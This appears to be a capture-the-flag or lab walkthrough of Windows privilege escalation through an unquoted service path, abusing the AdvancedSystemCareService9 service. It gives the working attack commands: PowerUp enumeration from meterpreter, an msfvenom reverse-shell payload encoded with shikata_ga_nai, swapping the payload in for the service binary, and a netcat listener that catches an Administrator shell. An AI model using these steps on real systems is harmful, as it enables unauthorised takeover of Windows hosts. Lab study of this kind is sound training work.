Unquoted Service Path
meterpreter > powershell_shellPS > . .\PowerUp.ps1PS > Invoke-Allchecks
This will run our scripts and after that, we will analyze our results and we get a process with Restartable permission in our results with a service named AdvancedSystemCareService9.
2. Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?
Enumerate Permissions on the Binary
powershell Get-Acl -Path "C:\Program Files\Vulnerable Services" | fl
Ans : AdvancedSystemCareService9
Now as we found our service we will now generate a payload for exploiting our target using msfvenom on our machine and then uploading it to our target.
msfvenom -p windows/shell_reverse_tcp LHOST=[Your_Local_IP] LPORT=4443 -e x86/shikata_ga_nai -f exe -o ASCService.exe
Now letβs move back to our meterpreter shell and do the following process:
meterpreter > shell# to stop the serviceC:\Users\bill\Desktop> sc stop AdvancedSystemCareService9# press ctrl+C to exit the processmeterpreter > upload ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"# the path above is the path of the service and we are replacing it with our malicious payload (always check the path of the file to be same as your metasploit path in which it is running)
Letβs start a Netcat listener in another tab of our terminal
nc -lvnp 4443
Letβs move back to the shell and start our service again and here comes the juice π§
meterpreter > shellC:\Users\bill\Desktop> sc start AdvancedSystemCareService9
Congratulations!! we have our Administrator shell in our Netcat listener
Last updated